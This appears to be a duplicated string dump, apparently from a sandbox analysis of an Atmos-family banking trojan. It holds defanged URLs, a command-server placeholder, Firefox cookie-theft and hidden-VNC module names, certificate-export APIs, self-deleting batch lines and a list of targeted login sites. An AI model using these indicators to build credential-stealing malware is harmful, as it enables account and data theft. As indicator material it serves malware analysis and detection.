
Z#%xDVOE

Z#%xDVOE

(00(7> 59

(00(7> 59

$6>59$=1

$6>59$=1

^EXKSQN_^%X Sf

^EXKSQN_^%X Sf

PR_OpenTCPSocket

PR_OpenTCPSocket

%s%s%s

%s%s%s

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

ole32.dll

ole32.dll

gdi32.dll

gdi32.dll

?

?

value=[%s], code=[%s]

value=[%s], code=[%s]

HTTP/1.1

HTTP/1.1

HTTP/1.0

HTTP/1.0

hXXps://

hXXps://

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

HTTP/1.

HTTP/1.

X-WebKit-CSP

X-WebKit-CSP

hXXp://VVV.google.com/webhp

hXXp://VVV.google.com/webhp

%COMMANDSERVER%

%COMMANDSERVER%

hXXp://127.0.0.1:%u/

hXXp://127.0.0.1:%u/

X-Type: %s

X-Type: %s

_getFirefoxCookie

_getFirefoxCookie

hXXp://

hXXp://

atmos_hvnc.module

atmos_hvnc.module

atmos_ffcookie.module

atmos_ffcookie.module

atmos_video.module

atmos_video.module

userenv.dll

userenv.dll

del "%s"

del "%s"

if exist "%s" goto d

if exist "%s" goto d

del /F "%s"

del /F "%s"

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)

urlmon.dll

urlmon.dll

cabinet.dll

cabinet.dll

hXXp://xxxxxxxx.com/xxxx/xxxx.php

hXXp://xxxxxxxx.com/xxxx/xxxx.php

%s, u %s %u u:u:u GMT

%s, u %s %u u:u:u GMT

; charset=%s

; charset=%s

HTTP/1.1 %u %s

HTTP/1.1 %u %s

Date: %s

Date: %s

Content-Length: %u

Content-Length: %u

Expires: %s

Expires: %s

Content-Type: %s%s

Content-Type: %s%s

ID: %s

ID: %s

value_%s

value_%s

value_%s_%s

value_%s_%s

%s = "%s";

%s = "%s";

*.facebook.com

*.facebook.com

*.twitter.com

*.twitter.com

*.instagram.com

*.instagram.com

*.booking.com

*.booking.com

*.sharepoint.com

*.sharepoint.com

*.yahoo.com

*.yahoo.com

login.yahoo.com

login.yahoo.com

*.google.com

*.google.com

accounts.google.com

accounts.google.com

192.168.*.*

192.168.*.*

127.0.0.1

127.0.0.1

*/wp-login.php*

*/wp-login.php*

*.xn--p1ai

*.xn--p1ai

Cookie: %s

Cookie: %s

Referer: %s

Referer: %s

Accept: %s

Accept: %s

Accept-Language: %s

Accept-Language: %s

Accept-Encoding: %s

Accept-Encoding: %s

SSSh8

SSSh8

9.tI3

9.tI3

CreatePipe

CreatePipe

GetWindowsDirectoryW

GetWindowsDirectoryW

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

GetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

RegCreateKeyW

RegCreateKeyW

RegEnumKeyW

RegEnumKeyW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegCloseKey

RegCloseKey

RegCreateKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegEnumKeyExW

ADVAPI32.dll

ADVAPI32.dll

UrlUnescapeA

UrlUnescapeA

SHDeleteKeyW

SHDeleteKeyW

PathIsURLW

PathIsURLW

SHLWAPI.dll

SHLWAPI.dll

ShellExecuteW

ShellExecuteW

ShellExecuteExW

ShellExecuteExW

SHELL32.dll

SHELL32.dll

Secur32.dll

Secur32.dll

GDI32.dll

GDI32.dll

WS2_32.dll

WS2_32.dll

PFXImportCertStore

PFXImportCertStore

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertOpenSystemStoreW

CertOpenSystemStoreW

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

HttpSendRequestExA

HttpSendRequestExA

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpEndRequestA

HttpEndRequestA

HttpSendRequestA

HttpSendRequestA

HttpEndRequestW

HttpEndRequestW

GetUrlCacheEntryInfoW

GetUrlCacheEntryInfoW

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpAddRequestHeadersA

InternetCrackUrlA

InternetCrackUrlA

InternetCrackUrlW

InternetCrackUrlW

WININET.dll

WININET.dll

OLEAUT32.dll

OLEAUT32.dll

NETAPI32.dll

NETAPI32.dll

VERSION.dll

VERSION.dll

NtQueryKey

NtQueryKey

ntdll.dll

ntdll.dll

PSSSSSSh

PSSSSSSh

SSSh4

SSSh4

SUWt^Ht[Ht.Huc

SUWt^Ht[Ht.Huc

2!242:2?2[2

2!242:2?2[2

Chrome

Chrome

Firefox

Firefox

nnspr4.dll

nnspr4.dll

nss3.dll

nss3.dll

chrome.dll

chrome.dll

Process (u minute): %s

Process (u minute): %s

Input: %s

Input: %s

X-TS-Rule-Name: %s

X-TS-Rule-Name: %s

X-TS-Rule-PatternID: %u

X-TS-Rule-PatternID: %u

X-TS-BotID: %s

X-TS-BotID: %s

X-TS-Domain: %s

X-TS-Domain: %s

X-TS-SessionID: %s

X-TS-SessionID: %s

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

X-TS-Header-Cookie: %S

X-TS-Header-Cookie: %S

X-TS-Header-Referer: %S

X-TS-Header-Referer: %S

X-TS-Header-AcceptEncoding: %S

X-TS-Header-AcceptEncoding: %S

X-TS-Header-AcceptLanguage: %S

X-TS-Header-AcceptLanguage: %S

X-TS-Header-UserAgent: %S

X-TS-Header-UserAgent: %S

kernel32.dll

kernel32.dll

Global\XXX

Global\XXX

Company: %s

Company: %s

Product: %s

Product: %s

Version: %s

Version: %s

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Microsoft\Windows\CurrentVersion\Uninstall

%u: %s | %s | %s

%u: %s | %s | %s

%sd1%

%sd1%

%sd2%

%sd2%

Name: %s

Name: %s

Path: %s

Path: %s

Hash: %s

Hash: %s

Time: u.u.u

Time: u.u.u

\StringFileInfo\xx\%s

\StringFileInfo\xx\%s

"%s" %s

"%s" %s

/c "%s"

/c "%s"

%sx.%s

%sx.%s

%sx

%sx

SELECT * FROM %s

SELECT * FROM %s

Rapport

Rapport

sXXXX

sXXXX

d*.swf

d*.swf

*.flv

*.flv

*.png

*.png

*.jpg

*.jpg

*.ico

*.ico

*.gif

*.gif

*.css

*.css

%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia

%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia

%Documents and Settings%\%current user%\Application Data\Uccyemuzput

%Documents and Settings%\%current user%\Application Data\Uccyemuzput

odobdima.xia

odobdima.xia

:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb

:\Documents and Settings\"%CurrentUserName%"\Application Data\Felaytzyymes\zaodxiibaru.ilb

%Documents and Settings%\%current user%\Application Data\Felaytzyymes

%Documents and Settings%\%current user%\Application Data\Felaytzyymes

zaodxiibaru.ilb

zaodxiibaru.ilb

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data

new.exe_3664_rwx_00400000_0000F000:

.text

.text

`.rdata

`.rdata

@.data

@.data

a%FnQU

a%FnQU

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

EnumChildWindows

EnumChildWindows

EnumWindows

EnumWindows

USER32.dll

USER32.dll

\d.nC

\d.nC

v1%ULRg

v1%ULRg

]j'

]j'

)%uj>_

)%uj>_

.io*U

.io*U

dxKeY

dxKeY

ntdll.dll

ntdll.dll

setup.dat

setup.dat

Explorer.EXE_1572_rwx_01EA0000_00047000:

.text

.text

`.data

`.data

.reloc

.reloc

update.exe

update.exe

config.bin

config.bin

%0&!%F

%0&!%F

?)500>(8

?)500>(8

7-52&

7-52&

,%)4.5(";$2

,%)4.5(";$2

:'$!71689/

:'$!71689/

-0=).?,7

-0=).?,7

60/)4:5

60/)4:5

-*?)2

-*?)2

>5;(4-2>)4 }744

>5;(4-2>)4 }744

"?5&"5%3%/

"?5&"5%3%/

398>7="'

398>7="'

;!)5:. =##

;!)5:. =##

Z#%xDVOE

Z#%xDVOE

(00(7> 59

(00(7> 59

$6>59$=1

$6>59$=1

^EXKSQN_^%X Sf

^EXKSQN_^%X Sf

PR_OpenTCPSocket

PR_OpenTCPSocket

%s%s%s

%s%s%s

gdiplus.dll

gdiplus.dll

GdiplusShutdown

GdiplusShutdown

ole32.dll

ole32.dll

gdi32.dll

gdi32.dll

?

?

value=[%s], code=[%s]

value=[%s], code=[%s]

HTTP/1.1

HTTP/1.1

HTTP/1.0

HTTP/1.0

hXXps://

hXXps://

GET /favicon.ico HTTP/1.1

GET /favicon.ico HTTP/1.1

HTTP/1.

HTTP/1.

X-WebKit-CSP

X-WebKit-CSP

hXXp://VVV.google.com/webhp

hXXp://VVV.google.com/webhp

%COMMANDSERVER%

%COMMANDSERVER%

hXXp://127.0.0.1:%u/

hXXp://127.0.0.1:%u/

X-Type: %s

X-Type: %s

_getFirefoxCookie

_getFirefoxCookie

hXXp://

hXXp://

atmos_hvnc.module

atmos_hvnc.module

atmos_ffcookie.module

atmos_ffcookie.module

atmos_video.module

atmos_video.module

userenv.dll

userenv.dll

del "%s"

del "%s"

if exist "%s" goto d

if exist "%s" goto d

del /F "%s"

del /F "%s"

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)

Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)

urlmon.dll

urlmon.dll

cabinet.dll

cabinet.dll

hXXp://xxxxxxxx.com/xxxx/xxxx.php

hXXp://xxxxxxxx.com/xxxx/xxxx.php

%s, u %s %u u:u:u GMT

%s, u %s %u u:u:u GMT

; charset=%s

; charset=%s

HTTP/1.1 %u %s

HTTP/1.1 %u %s

Date: %s

Date: %s

Content-Length: %u

Content-Length: %u

Expires: %s

Expires: %s

Content-Type: %s%s

Content-Type: %s%s

ID: %s

ID: %s

value_%s

value_%s

value_%s_%s

value_%s_%s

%s = "%s";

%s = "%s";

*.facebook.com

*.facebook.com

*.twitter.com

*.twitter.com

*.instagram.com

*.instagram.com

*.booking.com

*.booking.com

*.sharepoint.com

*.sharepoint.com

*.yahoo.com

*.yahoo.com

login.yahoo.com

login.yahoo.com

*.google.com

*.google.com

accounts.google.com

accounts.google.com

192.168.*.*

192.168.*.*

127.0.0.1

127.0.0.1

*/wp-login.php*

*/wp-login.php*

*.xn--p1ai

*.xn--p1ai

Cookie: %s

Cookie: %s

Referer: %s

Referer: %s

Accept: %s

Accept: %s

Accept-Language: %s

Accept-Language: %s

Accept-Encoding: %s

Accept-Encoding: %s

SSSh8

SSSh8

9.tI3

9.tI3

CreatePipe

CreatePipe

GetWindowsDirectoryW

GetWindowsDirectoryW

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

GetKeyboardState

GetKeyboardState

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

RegCreateKeyW

RegCreateKeyW

RegEnumKeyW

RegEnumKeyW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegCloseKey

RegCloseKey

RegCreateKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegEnumKeyExW

ADVAPI32.dll

ADVAPI32.dll

UrlUnescapeA

UrlUnescapeA

SHDeleteKeyW

SHDeleteKeyW

PathIsURLW

PathIsURLW

SHLWAPI.dll

SHLWAPI.dll

ShellExecuteW

ShellExecuteW

ShellExecuteExW

ShellExecuteExW

SHELL32.dll

SHELL32.dll

Secur32.dll

Secur32.dll

GDI32.dll

GDI32.dll

WS2_32.dll

WS2_32.dll

PFXImportCertStore

PFXImportCertStore

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertOpenSystemStoreW

CertOpenSystemStoreW

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

HttpSendRequestExA

HttpSendRequestExA

HttpQueryInfoA

HttpQueryInfoA

HttpSendRequestExW

HttpSendRequestExW

HttpSendRequestW

HttpSendRequestW

HttpOpenRequestA

HttpOpenRequestA

HttpOpenRequestW

HttpOpenRequestW

HttpEndRequestA

HttpEndRequestA

HttpSendRequestA

HttpSendRequestA

HttpEndRequestW

HttpEndRequestW

GetUrlCacheEntryInfoW

GetUrlCacheEntryInfoW

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpAddRequestHeadersA

InternetCrackUrlA

InternetCrackUrlA

InternetCrackUrlW

InternetCrackUrlW

WININET.dll

WININET.dll

OLEAUT32.dll

OLEAUT32.dll

NETAPI32.dll

NETAPI32.dll

VERSION.dll

VERSION.dll

NtQueryKey

NtQueryKey

ntdll.dll

ntdll.dll

PSSSSSSh

PSSSSSSh

SSSh4

SSSh4

SUWt^Ht[Ht.Huc

SUWt^Ht[Ht.Huc

2!242:2?2[2

2!242:2?2[2

Chrome

Chrome

Firefox

Firefox

nnspr4.dll

nnspr4.dll

nss3.dll

nss3.dll

chrome.dll

chrome.dll

Process (u minute): %s

Process (u minute): %s

Input: %s

Input: %s

X-TS-Rule-Name: %s

X-TS-Rule-Name: %s

X-TS-Rule-PatternID: %u

X-TS-Rule-PatternID: %u

X-TS-BotID: %s

X-TS-BotID: %s

X-TS-Domain: %s

X-TS-Domain: %s

X-TS-SessionID: %s

X-TS-SessionID: %s

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

X-TS-Header-Cookie: %S

X-TS-Header-Cookie: %S

X-TS-Header-Referer: %S

X-TS-Header-Referer: %S

X-TS-Header-AcceptEncoding: %S

X-TS-Header-AcceptEncoding: %S

X-TS-Header-AcceptLanguage: %S

X-TS-Header-AcceptLanguage: %S

X-TS-Header-UserAgent: %S

X-TS-Header-UserAgent: %S

kernel32.dll

kernel32.dll

Global\XXX

Global\XXX

Company: %s

Company: %s

Product: %s

Product: %s

Version: %s

Version: %s

Software\Microsoft\Windows\CurrentVersion\Uninstall

Software\Microsoft\Windows\CurrentVersion\Uninstall

%u: %s | %s | %s

%u: %s | %s | %s

%sd1%

%sd1%

%sd2%

%sd2%

Name: %s

Name: %s

Path: %s

Path: %s

Hash: %s

Hash: %s

Time: u.u.u

Time: u.u.u

\StringFileInfo\xx\%s

\StringFileInfo\xx\%s

"%s" %s

"%s" %s

/c "%s"

/c "%s"

%sx.%s

%sx.%s

%sx

%sx

SELECT * FROM %s

SELECT * FROM %s

Rapport

Rapport

sXXXX

sXXXX

d*.swf

d*.swf

*.flv

*.flv

*.png

*.png

*.jpg

*.jpg

*.ico

*.ico

*.gif

*.gif

*.css

*.css

%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia

%Documents and Settings%\%current user%\Application Data\Uccyemuzput\odobdima.xia

%Documents and Settings%\%current user%\Application Data\Uccyemuzput

%Documents and Settings%\%current user%\Application Data\Uccyemuzput

odobdima.xia

odobdima.xia

%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb

%Documents and Settings%\%current user%\Application Data\Felaytzyymes\zaodxiibaru.ilb

%Documents and Settings%\%current user%\Application Data\Felaytzyymes

%Documents and Settings%\%current user%\Application Data\Felaytzyymes

zaodxiibaru.ilb

zaodxiibaru.ilb

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data